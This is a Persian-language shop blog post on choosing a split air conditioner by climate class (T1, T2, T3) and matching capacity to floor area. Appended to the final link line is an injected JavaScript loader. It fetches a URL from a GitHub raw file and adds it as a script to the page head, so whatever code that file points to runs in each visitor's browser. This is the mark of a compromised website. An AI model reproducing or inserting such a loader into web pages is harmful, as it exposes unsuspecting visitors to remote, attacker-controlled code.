دسته‌بندی نشده

انتخاب کولر گازی بر اساس منطقه اب و هوایی

کولرگازی امروزه از وسایل بسیار پر طرفدار در بین کاربران محسوب می شوند. این محصول عموما در فصل گرما برای ایجاد خنک کنندگی بهتر در خانه و یا در محیط های مختلف مورد استفاده قرار می گیرند، این دستگاه در انواع مختلفی با طرح های گوناگون و ویژگی های مختلف موحود می باشد اما با این حال مدل دیواری یا همان اسپیلت پر طرفدار ترین نوع ان می باشد. کولر گازی ها را همچنین می توان در دو نوع تک کاره فقط برای ایجاد خنک کنندگی و یا دو منظوره برای خنک و گرم کردن محیط استفاده کرد. انتخاب یک کولر مناسب بر اساس فاکتور های متعددی انجام می گیرد اما یکی از مهم ترین ان ها انتخاب دستگاه مناسب با منطقه و نوع اب و هوای ان می باشد. در این مطلب انواع کلاس اب و هوایی موجود در کولرگازی ها و تناسب ان ها با اب و هوای مختلف را مورد بررسی قرار خواهیم داد.

کولرگازی ها عموما در سه دسته کلاس اب و هوایی قرار می گیرند:

T1

مناسب برای مناطقی با اب و هوای معتدل

کولرگازی های نوع T1 را می توان در مناطق معتدل مورد استفاده قرار داد. این کولر ها می توانند عملکرد مناسبی را تا دما 43 و در برخی مواقع 46 درجه سانتی گراد انجام دهند بنابراین می توان ان ها را در قسمت های شمالی به اسانی مورد استفاده قرار داد.

T2 

مناسب برای مناطقی با اب و هوای سرد

کولرگازی های نوع T2 را می توان در مناطق سرد استفاده کرد. در این قسمت ها بیشتر بخش گرم کولر مورد استفاده قرار می گیرد بنابراین قابلیت گرم کنندگی از اهمیت بیشتری برخوردار است. این کولر ها مناسب برای بخش ها غربی است و می تواند در دما 7 تا 35 درجه عملکردی مناسب داشته باشد.

T3

مناسب برای مناطق گرمسیر

کولرگازی های نوع T3 را می توان در مناقط بسیار گرم مورد استفاده قرار داد. این کولر ها عموما در دما بسیار بالا 52 درجه و در برخی موارد تا دما 60 درجه می تواند عملکردی بسیار عالی داشته باشد. قابلیت خنک کنندگی در این کولر ها به صورتی فوق العاده انجام می گیرد.

در انتخاب و خرید یک کولرگازی علاوه بر توجه به نوع کلاس اب و هوایی باید به ظرفیت ان نیز توجه شود، کولر ها را باید بر اساس متراژ خانه انتخاب کرد چراکه صرفا خرید ظرفیت بالا نمی تواند پاسخگویی مناسبی را در محیط داشته باشد. در نوشته پایین از ایهان کالا می توانید با کولرگازی مناسب برای متراژ های مختلف خانه بیشتر اشنا شوید.

محاسبه ظرفیت کولرگازی بر اساس متراژ خانه (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *